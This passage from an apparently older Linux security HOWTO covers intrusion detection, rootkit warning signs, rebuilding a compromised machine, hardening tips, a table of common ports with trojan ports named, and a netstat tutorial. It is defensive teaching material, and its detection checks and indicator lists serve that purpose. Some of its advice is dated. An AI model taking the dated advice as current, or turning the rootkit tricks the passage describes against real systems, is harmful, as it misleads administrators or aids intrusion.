But, by the same token, doing this certainly does no harm. And on larger LANs
that might be mixed platform, or with untrusted users, it would be advisable.
-----------------------------------------------------------------------------
6. Intrusion Detection
This section will deal with how to get early warning, how to be alerted after
the fact, and how to clean up from intrusion attempts.
-----------------------------------------------------------------------------
6.1. Intrusion Detection Systems (IDS)
Intrusion Detection Systems (IDS for short) are designed to catch what might
have gotten past the firewall. They can either be designed to catch an active
break-in attempt in progress, or to detect a successful break-in after the
fact. In the latter case, it is too late to prevent any damage, but at least
we have early awareness of a problem. There are two basic types of IDS: those
protecting networks, and those protecting individual hosts.
For host based IDS, this is done with utilities that monitor the filesystem
for changes. System files that have changed in some way, but should not
change -- unless we did it -- are a dead giveaway that something is amiss.
Anyone who gets in, and gets root, will presumably make changes to the system
somewhere. This is usually the very first thing done. Either so he can get
back in through a backdoor, or to launch an attack against someone else. In
which case, he has to change or add files to the system.
This is where tools like tripwire ([http://www.tripwire.org] http://
www.tripwire.org) play a role. Such tools monitor various aspects of the
filesystem, and compare them against a stored database. And can be configured
to send an alert if any changes are detected. Such tools should only be
installed on a known "clean" system.
For home desktops and home LANs, this is probably not an absolutely necessary
component of an overall security strategy. But it does give peace of mind,
and certainly does have its place. So as to priorities, make sure the Steps
1, 2 and 3 above are implemented and verified to be sound, before delving
into this.
RPM users can get somewhat the same results with rpm -Va, which will verify
all packages, but without all the same functionality. For instance, it will
not notice new files added to most directories. Nor will it detect files that
have had the extended attributes changed (e.g. chattr +i, man chattr and man
lsattr). For this to be helpful, it needs to be done after a clean install,
and then each time any packages are upgraded or added. Example:
+---------------------------------------------------------------------------+
| |
| # rpm -Va > /root/system.checked |
| |
| |
+---------------------------------------------------------------------------+
Then we have a stored system snapshot that we can refer back to.
Debian users have a similar tool with debsums.
+---------------------------------------------------------------------------+
| |
| # debsums -s > /root/system.checked |
| |
| |
+---------------------------------------------------------------------------+
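The stored snapshots are most useful when compared against a fresh run later
on. A sketch for RPM systems (substitute debsums -s on Debian); this assumes
the baseline was created right after a clean install, as above:

```
# Re-run the verification and compare against the stored baseline.
# Lines unique to the new run ('>') are changes made since the baseline.
rpm -Va > /tmp/system.now 2>/dev/null
diff /root/system.checked /tmp/system.now
```

Remember the caveat: if the system has since been compromised, rpm and diff
themselves may have been tampered with, so treat a clean result with some
skepticism.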
Another idea is to run chkrootkit ([http://www.chkrootkit.org/] http://
www.chkrootkit.org/) as a weekly cron job. This will detect common
"rootkits".
-----------------------------------------------------------------------------
6.2. Have I Been Hacked?
Maybe you are reading this because you've noticed something "odd" about your
system, and are suspicious that someone has gotten in? This can be a clue.
The first thing an intruder typically does is install a "rootkit". There are
many prepackaged rootkits available on the Internet. The rootkit is
essentially a script, or set of scripts, that makes quick work of modifying
the system so the intruder is in control, and he is well hidden. He does this
by installing modified binaries of common system utilities and tampering with
log files. Or by using special kernel modules that achieve similar results.
So common commands like ls may be modified so as to not show where he has his
files stored. Clever!
A well designed rootkit can be quite effective. Nothing on the system can
really be trusted to provide accurate feedback. Nothing! But sometimes the
modifications are not as smooth as intended and give hints that something is
not right. Some things that might be warning signs:
  * Login acts weird. Maybe no one can login. Or only root can login. Any
login weirdness at all should be suspicious. Similarly, any weirdness
with adding or changing passwords.
Weirdness with other system commands (e.g. top or ps) should be cause for
concern as well.
  * System utilities are slower, or awkward, or show strange and unexpected
results. Common utilities that might be modified are: ls, find, who, w,
last, netstat, login, ps, top. This is not a definitive list!
  * Files or directories named "..." or ".. " (dot dot space). A sure bet in
this case. Files with haxor looking names like "r00t-something".
  * Unexplained bandwidth usage, or connections. Script kiddies have a
fondness for IRC, so such connections should raise a red flag.
  * Logs that are missing completely, or missing large sections. Or a sudden
change in syslog behavior.
  * Mysterious open ports, or processes.
  * Files that cannot be deleted or moved. Some rootkits use chattr to make
files "immutable", or not changeable. This kind of change will not show up
with ls, or rpm -V, so the files look normal at first glance. See the man
pages for chattr and lsattr on how to reverse this. Then see the next
section below on restoring your system as the jig is up at this point.
This is becoming a more and more common script kiddie trick. In fact, one
quick test to run on a suspected system (as root):
+---------------------------------------------------------------+
| /usr/bin/lsattr `echo $PATH | tr ':' ' '` | grep i-- |
| |
+---------------------------------------------------------------+
This will look for any "immutable" files in root's PATH, which is almost
surely a sign of trouble since no standard distributions ship files in
this state. If the above command turns up anything at all, then plan on
completely restoring the system (see below). A quick sanity check:
+---------------------------------------------------------------+
| # chattr +i /bin/ps |
| # /usr/bin/lsattr `echo $PATH | tr ':' ' '` | grep "i--" |
| ---i---------- /bin/ps |
| # chattr -i /bin/ps |
| |
+---------------------------------------------------------------+
This is just to verify the system is not tampered with to the point that
lsattr is completely unreliable. The third line is exactly what you
should see.
  * Indications of a "sniffer", such as log messages of an interface entering
"promiscuous" mode.
  * Modifications to /etc/inetd.conf, rc.local, rc.sysinit or /etc/passwd.
Especially, any additions. Try using cat or tail to view these files.
Additions will most likely be appended to the end. Remember though such
changes may not be "visible" to any system tools.
Sometimes the intruder is not so smart and forgets about root's
.bash_history, or cleaning up log entries, or even leaves strange, leftover
files in /tmp. So these should always be checked too. Just don't necessarily
expect them to be accurate. Often such left behind files, or log entries,
will have obvious script kiddie sounding names, e.g. "r00t.sh".
Packet sniffers, like tcpdump ([http://www.tcpdump.org] http://
www.tcpdump.org), might be useful in finding any uninvited traffic.
Interpreting sniffer output is probably beyond the grasp of the average new
user. snort ([http://www.snort.org] http://www.snort.org), and ethereal
([http://www.ethereal.com] http://www.ethereal.com), are also good. Ethereal
has a GUI.
As mentioned, a compromised system will undoubtedly have altered system
binaries, and the output of system utilities is not to be trusted. Nothing on
the system can be relied upon to be telling you the whole truth.
Re-installing individual packages may or may not help since it could be
system libraries or kernel modules that are doing the dirty work. The point
here is that there is no way to know with absolute certainty exactly what
components have been altered.
RPM users can use rpm -Va |less to attempt to verify the integrity of all
packages. But again there is no assurance that rpm itself has not been
tampered with, or the system components that RPM relies on.
If you have pstree on your system, try this instead of the standard ps.
Sometimes the script kiddies forget about this one. No guarantees though that
this is accurate either.
You can also try querying the /proc filesystem, which contains everything the
kernel knows about processes that are running:
+---------------------------------------------------------------------------+
| |
| # cat /proc/*/stat | awk '{print $1,$2}' |
| |
| |
+---------------------------------------------------------------------------+
This will provide a list of all processes and PID numbers (assuming a
malicious kernel module is not hiding this).
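Along the same lines, the sketch below compares the PIDs present in /proc
against what ps is willing to report. A PID that ps cannot see is suspicious,
though a process that exits mid-scan can cause a harmless false alarm, and a
malicious kernel module can of course hide from this check too:

```shell
#!/bin/sh
# Flag PIDs that are visible in /proc but not reported by ps.
for dir in /proc/[0-9]*; do
    pid="${dir#/proc/}"
    ps -p "$pid" > /dev/null 2>&1 || echo "Hidden? PID $pid"
done
```

As with pstree, no guarantees: this is one more cross-check, not proof of a
clean system.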
Another approach is to visit [http://www.chkrootkit.org] http://
www.chkrootkit.org, download their rootkit checker, and see what it says.
Some interesting discussions on issues surrounding forensics can be found at
[http://www.fish.com/security/] http://www.fish.com/security/. There is also
a collection of tools available, aptly called "The Coroner's Toolkit" (TCT).
Read below for steps on recovering from an intrusion.
-----------------------------------------------------------------------------
6.3. Reclaiming a Compromised System
So now you've confirmed a break-in, and know that someone else has root
access, and quite likely one or more hidden backdoors to your system. You've
lost control. How to clean up and regain control?
There is no sure fire way of doing this short of a complete re-install. There
is no way to find with assurance all the modified files and backdoors that
may have been left. Trying to patch up a compromised system risks a false
sense of security and may actually aggravate an already bad situation.
The steps to take, in this order:
  * Pull the plug and disconnect the machine. You may be unwittingly
participating in criminal activity, and doing to others what has been
done to you.
  * Depending on the needs of the situation and time available to restore the
system, it is advantageous to learn as much as you can about how the
attacker got in, and what was done in order to plug the hole and avoid a
recurrence. This could conceivably be time consuming, and is not always
feasible. And it may require more expertise than the typical user
possesses.
  * Backup important data. Do not include any system files in the backup, nor
system configuration files like inetd.conf. Limit the backup to personal
data files only! You don't want to backup, then restore something that
might open a backdoor or other hole.
  * Re-install from scratch, and reformat the drive during the installation (
mke2fs) to make sure no remnants are hiding. Actually, replacing the
drive is not a bad idea. Especially, if you want to keep the compromised
data available for further analysis.
  * Restore from backups. After a clean install is the best time to install
an IDS (Intrusion Detection System) such as tripwire ([http://
www.tripwire.org] http://www.tripwire.org).
  * Apply all updates or patches for your distribution. Check your vendor's
web site for security related notices.
  * Re-examine your system for unnecessary services. Re-examine your firewall
and access policies, and tighten all holes. Use new passwords, as the old
ones were in all likelihood stolen.
  * Re-connect system ;-)
At this time, any rootkit cleanup tools that may be available on-line are not
recommended. They probably do work just fine most of the time. But again, how
to be absolutely sure that all is well and all vestiges of the intrusion are
gone?
-----------------------------------------------------------------------------
7. General Tips
This section will quickly address some general concepts for maintaining a
more secure and reliable system or network. Let's emphasize "maintaining"
here since computer systems change daily, as does the environment around
them. As mentioned before, there isn't any one thing that makes a system
secure. There are too many variables. Security is an approach and an attitude
more than it is a reliance on any particular product, application or specific
policy.
  * Do not allow remote root logins. This may be controlled by a
configuration file such as /etc/securetty. Remove any lines that begin
"pts". This is one big security hole.
  * In fact, don't log in as root at all. Period. Log in on your user account
and su to root when needed. Whether the login is remote or local. Or use
sudo, which can run individual commands with root privileges. (There
should be a sudo package available from your vendor.) This takes some
getting used to, but it is the "right" way to do things. And the safest.
And will become a more and more natural way of doing things as time goes on.
I know someone is saying right now "but that is so much trouble, I am
root, and it is my system". True, but root is a specialized account that
was not ever meant to be used as a regular user account. Root has access
to everything, even hardware devices. The system "trusts" root. It
believes that you know what you are doing. If you make a mistake, it
assumes that you meant it, and will do its best to do what you told it
to do...even if that destroys the system!
As an example, let's say you start X as root, open Netscape, and visit a
web site. The web page has badly behaved JavaScript. And conceivably now
that badly written JavaScript might have access to much more of your
system than if you had done it the "right" way.
  * Take passwords seriously. Don't give them out to anyone. Don't use the
same one for everything. Don't use root's password for anything else --
except root's password! Never sign up or register on line, using any of
your system passwords. Passwords should be a combination of mixed case
letters, numbers and/or punctuation and a reasonable length (eight
characters or longer). Don't use so-called "dictionary" words that are
easy to guess like "cat" or "dog". Don't incorporate personal information
like names or dates or hostnames. Don't write down system passwords --
memorize them.
Use the more secure "shadow" passwords. This should be the default for
any recent Linux distribution now. If the file /etc/shadow exists, then
it is enabled already. The commands pwconv and grpconv, can be used to
convert password and group files to shadow format if available.
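The shadow password check above is a one-liner. A minimal sketch (the paths are the conventional ones; pwconv itself must be run as root, so it is only mentioned here, not executed):

```shell
# If /etc/shadow exists, shadow passwords are already enabled;
# otherwise pwconv (run as root) will convert /etc/passwd over.
if [ -f /etc/shadow ]; then
    echo "shadow passwords are enabled"
else
    echo "no /etc/shadow -- consider running pwconv as root"
fi
```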
  * Avoid using programs that require clear text logins over untrusted
networks like the Internet. Telnet is a prime example. ssh is much
better. If there is any support for SSL (Secure Socket Layers), use it.
For instance, does your ISP offer POP or IMAP mail via SSL? Recent
distributions should include [http://www.openssl.org/] openssl, and many
Linux applications can use SSL where support is available.
  * Set resource limits. There are various ways to do this. The need for this
probably increases with the number of users accessing a given system. Not
only does setting limits on such things as disk space prevent intentional
mischief, it can also help with unintentionally misbehaved applications
or processes. quota (man quota) can be used to set disk space limits.
Bash includes the ulimit command (man ulimit or man bash), which can limit
various functions on a per-user basis.
Also, not discussed here at any length, PAM (Pluggable Authentication
Modules) has a very sophisticated approach to controlling various system
functions and resources. See man pam to get started. PAM is configured
via either /etc/pam.conf or /etc/pam.d/*, along with the files in
/etc/security/*, including /etc/security/limits.conf, where again various
sane limits can be imposed. An in-depth look at PAM is beyond the scope
of this document.
The User-Authentication HOWTO ([http://tldp.org/HOWTO/
User-Authentication-HOWTO/index.html] http://tldp.org/HOWTO/
User-Authentication-HOWTO/index.html) has more on this.
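A small sketch of the ulimit side of this. The limit set here applies only to the current shell and its children; the limits.conf lines are illustrative examples of the PAM mechanism mentioned above and are not applied by this snippet:

```shell
# Per-process limits via bash's ulimit builtin.
ulimit -S -c 0                         # soft limit: disable core dumps
echo "core file size limit: $(ulimit -S -c)"

# Example /etc/security/limits.conf entries (illustrative only):
#   @users   hard   nproc   100       # at most 100 processes per user
#   @users   hard   fsize   50000     # max file size, in KB
```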
  * Make sure someone with a clue is getting root's mail. This can be done
with an "alias". Typically, the mail server will have a file such as
/etc/aliases where this can be defined. This can conceivably be an
account on another machine if need be:
+---------------------------------------------------------------+
| |
| # Person who should get root's mail. This alias |
| # must exist. |
| # CHANGE THIS LINE to an account of a HUMAN |
| root: hal@bigcat |
| |
| |
+---------------------------------------------------------------+
Remember to run newaliases (or equivalent) afterward.
  * Be careful where you get software. Use trusted sources. How well do you
trust complete strangers? Check your vendor first if looking for a
specific package. It will probably be best suited for your system
anyway. Or, the original package's project site is good as well. Installing
from raw source (either tarball or src.rpm) at least gives you the
ability to examine the code. Even if you don't understand it ;-) While
this does not seem to be a widespread problem with Linux software sites,
it is trivial for someone to add a few lines of code, turning
that harmless looking binary into a "Trojan horse" that opens a backdoor
to your system. Then the jig is up.
  * So someone has scanned you, probed you, or otherwise seems to want into
your system? Don't retaliate. There is a good chance that the source IP
address is a compromised system, and the owner is a victim already. Also,
you may be violating someone's Terms of Service, and have trouble with
your own ISP. The best you can do is to send your logs to the abuse
department of the source IP's ISP, or owner. This is often something like
"abuse@someisp.com". Just don't expect to hear much back. Generally
speaking, such activity is not legally criminal, unless an actual
break-in has taken place. Furthermore, even if criminal, it will never be
prosecuted unless significant damage (read: big dollars) can be shown.
  * Red Hat, Mandrake and Debian users can install the "Bastille Hardening
System", [http://www.bastille-linux.org/] http://www.bastille-linux.org/.
This is a multi-purpose system for "hardening" Red Hat and Mandrake
system security. It has a GUI interface which can be used to construct
firewall scripts from scratch and configure PAM among many other things.
Debian support is new.
  * So you have a full-time Internet connection via cable-modem or DSL. But
do you always use it, or always need it? There's an old saying that "the
only truly secure system is a disconnected system". Well, that's
certainly one option. So take that interface down, or stop the
controlling daemon (dhcpcd, pppoed, etc). Or possibly even set up cron
jobs to bring your connection up and down according to your normal
schedule and usage.
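Such cron jobs might look like the entries below. The interface name (eth0) and the ifup/ifdown scripts are assumptions; substitute your distribution's equivalents, such as stopping the dhcpcd or pppoed daemon. The snippet only prints the entries rather than installing them:

```shell
# Hypothetical crontab entries: link up at 7:00 am, down at midnight.
cat <<'EOF'
0 7 * * *  /sbin/ifup eth0
0 0 * * *  /sbin/ifdown eth0
EOF
```

These would go in root's crontab (crontab -e as root) on a system where those scripts exist.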
  * What about cable and DSL routers that are often promoted as "firewalls"?
The lower priced units are mostly equating NAT (Network Address
Translation), together with the ability to open holes for ports through
it, as a firewall. While NAT itself does provide a fair degree of
security for the systems behind the NAT gateway, this does not constitute
anything but a very rudimentary firewall. And if holes are opened, there
is still exposure. Also, you are relying on the router's firmware and
implementation not to be flawed. It is wise to have some kind of
additional protection behind such routers.
  * What about wireless network cards and hubs? Insecure, despite what the
manufacturers may claim. Treat these connections just as you would an
Internet connection. Use secure protocols like ssh only! Even if it is
just one LAN box to another.
  * If you find you need to run a particular service, and it is for just you,
or maybe a relatively small number of people, use a non-standard port.
Most server daemons support this. For instance, sshd runs on port 22 by
default. All worms and script kiddies will expect it there, and look for
it there. So, run it on another port! See the sshd man page.
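For sshd, moving to a non-standard port is a single directive in /etc/ssh/sshd_config (the port number 2222 here is just an example). Shown as text rather than applied:

```shell
# The server-side change (one line in the sshd configuration file):
cat <<'EOF'
# /etc/ssh/sshd_config
Port 2222
EOF
# Clients would then connect with:  ssh -p 2222 user@host
```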
  * What about firewalls that block Internet connections according to the
application (like ZoneAlarm from Windowsdom)? These were designed with
this feature primarily because of the plethora of viruses and trojans that
are so common with MS operating systems. This is really not a problem on
Linux, so no such application exists on Linux at this time, and there
does not seem to be enough demand for one that someone has taken the
time to implement it. A better firewall can be had on Linux by following
the other suggestions in this document.
  * Lastly, know your system! Let's face it, if you are new to Linux, you
can't already know something you have never used. Understood. But in the
process of learning, learn how to do things the right way, not the
easiest way. There are several decades of history behind "the right way"
of doing things. This has stood the test of time. What may seem
unnecessary or burdensome now will make sense in due time.
Be familiar with whatever services you are running, and the implications
these services might have to the overall health of your system if
something does go wrong. Read what you can, and ask questions. Don't run
something as a service "just because I can", or because the installer put
it there. Clearly you can't start out as an experienced system
administrator. But you can work to learn enough about your own system
that you are in control. This is one thing that separates *nix from MS
systems: we can never be in complete control with MS, but we can with
*nix. Consequently, if something bad happens, we often have no one else
to blame.
-----------------------------------------------------------------------------
8. Appendix
8.1. Servers, Ports, and Packets
Let's take a quick, non-technical look at some networking concepts, and how
they can potentially impact our own security. We don't need to know much
about networking, but a general idea of how things work is certainly going to
help us with firewalls and other related issues.
As you may have noticed, Linux is a very network oriented Operating System.
Much is done by connecting to "servers" of one type or another -- X servers,
font servers, print servers, etc.
Servers provide "services", which provide various capabilities, both to the
local system and potentially other remote systems. The same server generally
provides both functionalities. Some servers work quietly behind the scenes,
and others are more interactive by nature. We may only be aware of a print
server when we need to print something, but it is there running, listening,
and waiting for connection requests whether we ever use it or not (assuming
of course we have it enabled). A typical Linux installation will have many,
many types of servers available to it. Default installations often will turn
some of these "on".
And even if we are not connected to a real network all the time, we are still
"networked" so to speak. Take our friendly local X server for instance. We
may tend to think of this as just providing a GUI interface, which is only
true to a point. It does this by "serving" to client applications, and thus
is truly a server. But X Windows is also capable of serving remote clients
over a network -- even large networks like the Internet. Though we probably
don't really want to be doing this ;-)
And yes, if you are not running a firewall or have not taken other
precautions, and are connected to the Internet, it is quite possible that
someone -- anyone -- could connect to your X server. X11 "listens" on TCP
"port" 6000 by default. This principle applies to most other servers as well
-- they can be easily connected to, unless something is done to restrict or
prevent connections.
In TCP/IP (Transmission Control Protocol/Internet Protocol) networks like we
are talking about with Linux and the Internet, every connected computer has a
unique "IP Address". Think of this like a phone number. You have a phone
number, and in order to call someone else, you have to know that phone
number, and then dial it. The phone numbers have to be unique for the system
to work. IP addresses are generally expressed as "dotted quad" notation, e.g.
152.19.254.81.
On this type of network, servers are said to "listen". This means that they
have a "port" opened, and are awaiting incoming connections to that port.
Connections may be local, as is typically the case with our X server, or
remote -- meaning from another computer "somewhere". So servers "listen" on a
specific "port" for incoming connections. Most servers have a default port,
such as port 80 for web servers. Or 6000 for X11. See /etc/services for a
list of common ports and their associated service.
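The /etc/services lookup can be sketched as below. This uses a small sample excerpt so the example is self-contained; on a real system you would search /etc/services directly (e.g. with grep):

```shell
# Map a port number to its conventional service name.
cat > services.sample <<'EOF'
ftp             21/tcp
ssh             22/tcp
smtp            25/tcp
http            80/tcp
printer         515/tcp         spooler
x11             6000/tcp
EOF
awk '$2 == "80/tcp" { print $1 }' services.sample
```

Here the second field is the port/protocol pair, so the awk match prints the service name registered for TCP port 80.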
The "port" is actually just an address in the kernel's networking stack, and
is a method that TCP, and other protocols, use to organize connections and
the exchange of data between computers. There are a total of 65,536 TCP and UDP
ports available, though usually only a relatively few of these are used at
any one time. These are classified as "privileged", those ports below 1024,
and "unprivileged", 1024 and above. Most servers use the privileged ports.
Only one server may listen on, or "bind" to, a port at a time. Though that
server may well be able to open multiple connections via that one port.
Computers talk to each other via these "port" connections. One computer will
open a connection to a "port" on another computer, and thus be able to
exchange data via the connection that has been established between their
respective ports.
Getting back to the phone analogy, and stretching it a bit, think of calling
a large organization with a complex phone system. The organization has many
"departments": sales, shipping, billing, receiving, customer service, R&D,
etc. Each department has its own "extension" number. So the shipping
department might be extension 21, sales might be extension 80, and so on.
The main phone number is the IP Address, and the department's extension is
the port in this analogy. The "department's" number is always the same when
we call. And generally they can handle many simultaneous incoming calls.
The data itself is contained in "packets", which are small chunks of data,
generally 1500 bytes or less each. Packets are used to control and organize
the connection, as well as carry data. There are different types of packets.
Some are specifically used for controlling the connection, and then some
packets carry our data as their payload. If there is a lot of data, it will
be broken up into multiple packets which is almost always how it works. The
packets will be transmitted one at a time, and then "re-assembled" at the
other end. One web page for instance, will take many packets to transmit --
maybe hundreds or even thousands. This all happens very quickly and
transparently.
We can see a typical connection between two computers in this one line
excerpt from netstat output:
+---------------------------------------------------------------------------+
| tcp 30 0 169.254.179.139:1359 18.29.1.67:21 CLOSE_WAIT |
| |
| |
+---------------------------------------------------------------------------+
The interesting part is the IP addresses and ports in the fourth and fifth
columns. The port is the number just to the right of the colon. The left side
of the colon is the IP address of each computer. The fourth column is the
local address, or our end of the connection. In the example, 169.254.179.139
is the IP address assigned by my ISP. It is connected to port 21 (FTP) on
18.29.1.67, which is rpmfind.net. This is just after an FTP download from
rpmfind.net. Note that while I am connected to their FTP server on their port
21, the port on my end that is used by my FTP client is 1359. This is a
randomly assigned "unprivileged" port, used for my end of the two-way
"conversation". The data moves in both directions: me:port#1359 <-> them:port
#21. The FTP protocol is actually a little more complicated than this, but we
won't delve into the finer points here. The CLOSE_WAIT is the TCP state of
the connection at this particular point in time. Eventually the connection
will close completely on both ends, and netstat will not show anything for
this.
The "unprivileged" port that is used for my end of the connection, is
temporary and is not associated with a locally running server. It will be
closed by the kernel when the connection is terminated. This is quite
different than the ports that are kept open by "listening" servers, which are
permanent and remain "open" even after a remote connection is terminated.
So to summarize using the above example, we have client (me) connecting to a
server (rpmfind.net), and the connection is defined and controlled by the
respective ports on either end. The data is transmitted and controlled by
packets. The server is using a "privileged" port (i.e. a port below number
1024) which stays open listening for connections. The "unprivileged" port
used on my end by my client application is temporary, is only opened for the
duration of the connection, and only responds to the server's port at the
other end of the connection. This type of port is not vulnerable to attacks
or break-ins generally speaking. The server's port is vulnerable since it
remains open. The administrator of the FTP server will need to take
appropriate precautions that his server is secure. Other Internet
connections, such as to web servers or mail servers, work similarly to the
above example, though the server ports are different. SMTP mail servers use
port 25, and web servers typically use port 80. See the Ports section for
other commonly used ports and services.
One more point on ports: ports are only accessible if there is something
listening on that port. No one can force a port open if there is no service
or daemon listening there, ready to handle incoming connection requests. A
closed port is a totally safe port.
And a final point on the distinction between clients and servers. The example
above did not have a telnet or ftp server in the LISTENER section in the
netstat example above. In other words, no such servers were running locally.
You do not need to run a telnet or ftp server daemon in order to connect to
somebody else's telnet or ftp server. These are only for providing these
services to others that would be making connections to you. Which you don't
really want to be doing in most cases. This in no way affects the ability to
use telnet and ftp client software.
-----------------------------------------------------------------------------
8.2. Common Ports
A quick run down of some commonly seen and used ports, with the commonly
associated service name, and risk factor. All have some risk. It is just that
some have historically had more exploits than others. That is how they are
evaluated below, and not necessarily to be interpreted as whether any given
service is safe or not.
1-19, assorted protocols, many of which are antiquated, and probably none of
which are needed on a modern system. If you don't know what any of these are,
then you definitely don't need them. The echo service (port 7) should not be
confused with the common ping program. Leave all these off.
20 - FTP-DATA. "Active" FTP connections use two ports: 21 is the control
port, and 20 is where the data comes through. Passive FTP does not use port
20 at all. Low risk, but see below.
21 - FTP server port, aka File Transfer Protocol. A well entrenched protocol
for transferring files between systems. Very high risk, and maybe the number
one crack target.
22 - SSH (Secure Shell), or sometimes PCAnywhere. Low to moderate risk (yes
there are exploits even against so called "secure" services).
23 - Telnet server. For LAN use only. Use ssh instead in non-secure
environments. Moderate risk.
25 - SMTP, Simple Mail Transfer Protocol, or mail server port, used for
sending outgoing mail, and transferring mail from one place to another.
Moderate risk. This has had a bad history of exploits, but has improved
lately.
37 - Time service. This is the built-in inetd time service. Low risk. For LAN
use only.
53 - DNS, or Domain Name Server port. Name servers listen on this port, and
answer queries for resolving host names to IP addresses. High Risk.
67 (UDP) - BOOTP, or DHCP, server port. Low risk. If using DHCP on your LAN,
this does not need to be exposed to the Internet.
68 (UDP) - BOOTP, or DHCP, client port. Low risk.
69 - tftp, or Trivial File Transfer Protocol. Extremely insecure. LAN only,
if really, really needed.
79 - Finger, used to provide information about the system, and logged in
users. Low risk as a crack target, but gives out way too much information and
should not be run.
80 - WWW or HTTP standard web server port. The most commonly used service on
the Internet. Low risk.
98 - Linuxconf web access administrative port. LAN only, if really needed at
all.
110 - POP3, aka Post Office Protocol, mail server port. POP mail is mail that
the user retrieves from a remote system. Low risk.
111 - sunrpc (Sun Remote Procedure Call), or portmapper port. Used by NFS
(Network File System), NIS (Network Information Service), and various related
services. Sounds dangerous and is high risk. LAN use only. A favorite crack
target.
113 - identd, or auth, server port. Used, and sometimes required, by some
older style services (like SMTP and IRC) to validate the connection. Probably
not needed in most cases. Low risk, but could give an attacker too much
information about your system.
119 -- nntp or news server port. Low risk.
123 - Network Time Protocol for synchronizing with time servers where a high
degree of accuracy is required. Low risk, but probably not required for most
users. rdate is an easier and more secure way of updating the system
clock. And then inetd's built in time service for synchronizing LAN systems
is another option.
137-139 - NetBios (SMB) services. Mostly a Windows thing. Low risk on Linux,
but LAN use only. 137 is a very commonly seen port attempt. A rather
obnoxious protocol from Redmond that generates a lot of "noise", much of
which is harmless.
143 - IMAP, Interim Mail Access Protocol. Another mail retrieval protocol.
Low to moderate risk.
161 - SNMP, Simple Network Management Protocol. More commonly used in routers
and switches to monitor statistics and vital signs. Not needed for most of
us, and low risk.
177 - XDMCP, the X Display Management Control Protocol for remote connections
to X servers. Low risk, but LAN only is recommended.
443 - HTTPS, a secure HTTP (WWW) protocol in fairly wide use. Low risk.
465 - SMTP over SSL, secure mail server protocol. Low risk.
512 (TCP) - exec is how it shows in netstat. Actually the proper name is
rexec, for Remote Execution. Sounds dangerous, and is. High risk, LAN only if
at all.
512 (UDP) - biff, a mail notification protocol. Low risk, LAN only.
513 - login, actually rlogin, aka Remote Login. No relation to the standard /
bin/login that we use every time we log in. Sounds dangerous, and is. High
risk, and LAN only if really needed.
514 (TCP) - shell is the nickname, and how netstat shows it. Actually, rsh is
the application for "Remote Shell". Like all the "r" commands, this is a
throwback to kinder, gentler times. Very insecure, so high risk, and LAN
only usage, if at all.
514 (UDP) - syslog daemon port, only used for remote logging purposes. The
average user does not need this. Probably low risk, but definitely LAN only
if really required.
515 - lp or print server port. High risk, and LAN only of course. Someone on
the other side of the world does not want to use your printer for its
intended purpose!
587 - MSA, or "submission", the Mail Submission Agent protocol. A new mail
handling protocol supported by most MTA's (mail servers). Low risk.
631 - the CUPS (print daemon) web management port. LAN only, low risk.
635 - mountd, part of NFS. LAN use only.
901 - SWAT, Samba Web Administration Tool port. LAN only.
993 - IMAP over SSL, secure IMAP mail service. Very low risk.
995 - POP over SSL, secure POP mail service. Very low risk.
1024 - This is the first "unprivileged" port, which is dynamically assigned
by the kernel to whatever application requests it. This can be almost
anything. Ditto for ports just above this.
1080 - Socks Proxy server. A favorite crack target.
1243 - SubSeven Trojan. Windows only problem.
1433 - MS SQL server port. A sometimes target. N/A on Linux.
2049 - nfsd, Network File Service Daemon port. High risk, and LAN usage only
is recommended.
3128 - Squid proxy server port. Low risk, but for most should be LAN only.
3306 - MySQL server port. Low risk, but for most should be LAN only.
5432 - PostgreSQL server port. LAN only, relatively low risk.
5631 (TCP), 5632 (UDP) - PCAnywhere ports. Windows only. PCAnywhere can be
quite "noisy", broadcasting to wide address ranges.
6000 - X11 TCP port for remote connections. Low to moderate risk, but again,
this should be LAN only. Actually, this can include ports 6000-6009 since X
can support multiple displays and each display would have its own port. ssh's
X11Forwarding will start using ports at 6010.
6346 - gnutella.
6667 - ircd, Internet Relay Chat Daemon.
6699 - napster.
7100-7101 - Some font servers use these ports. Low risk, but LAN only.
8000 and 8080 - common web cache and proxy server ports. LAN only.
10000 - webmin, a web based system administration utility. Low risk at this
point.
27374 - SubSeven, a commonly probed for Windows only Trojan. Also, 1243.
31337 - Back Orifice, another commonly probed for Windows only Trojan.
More services and corresponding port numbers can be found in /etc/services.
Also, the "official" list is [http://www.iana.org/assignments/port-numbers]
http://www.iana.org/assignments/port-numbers.
A great analysis of what probes to these and other ports might mean from
Robert Graham: [http://www.linuxsecurity.com/resource_files/firewalls/
firewall-seen.html] http://www.linuxsecurity.com/resource_files/firewalls/
firewall-seen.html. A very good reference.
Another point here, these are the standard port designations. There is no law
that says any service has to run on a specific port. Usually they do, but
certainly they don't always have to.
Just a reminder that when you see these types of ports in your firewall logs,
it is not anything to go off the deep end about. Not if you have followed
Steps 1-3 above, and verified your firewall works. You are fairly safe. Much
of this traffic may be "stray bullets" too -- Internet background noise,
misconfigured clients or routers, noisy Windows stuff, etc.
-----------------------------------------------------------------------------
8.3. Netstat Tutorial
8.3.1. Overview
netstat is a very useful utility for viewing the current state of your
network status -- what servers are listening for incoming connections, what
interfaces they listen on, who is connected to us, who we are connected to, and
so on. Take a look at the man page for some of the many command line options.
We'll just use a relative few options here.
As an example, let's check all currently listening servers and active
connections for both TCP and UDP on our hypothetical host, bigcat. bigcat is
a home desktop installation, with a DSL Internet connection in this example.
bigcat has two ethernet cards: one for the external connection to the ISP,
and one for a small LAN with an address of 192.168.1.1.
+--------------------------------------------------------------------------------+
| |
|$ netstat -tua |
|Active Internet connections (servers and established) |
|Proto Recv-Q Send-Q Local Address Foreign Address State |
|tcp 0 0 *:printer *:* LISTEN |
|tcp 0 0 bigcat:8000 *:* LISTEN |
|tcp 0 0 *:time *:* LISTEN |
|tcp 0 0 *:x11 *:* LISTEN |
|tcp 0 0 *:http *:* LISTEN |
|tcp 0 0 bigcat:domain *:* LISTEN |
|tcp 0 0 bigcat:domain *:* LISTEN |
|tcp 0 0 *:ssh *:* LISTEN |
|tcp 0 0 *:631 *:* LISTEN |
|tcp 0 0 *:smtp *:* LISTEN |
|tcp 0 1 dsl-78-199-139.s:1174 64.152.100.93:nntp SYN_SENT |
|tcp 0 1 dsl-78-199-139.s:1175 64.152.100.93:nntp SYN_SENT |
|tcp 0 1 dsl-78-199-139.s:1173 64.152.100.93:nntp SYN_SENT |
|tcp 0 0 dsl-78-199-139.s:1172 207.153.203.114:http ESTABLISHED |
|tcp 1 0 dsl-78-199-139.s:1199 www.xodiax.com:http CLOSE_WAIT |
|tcp 0 0 dsl-78-199-139.sd:http 63.236.92.144:34197 TIME_WAIT |
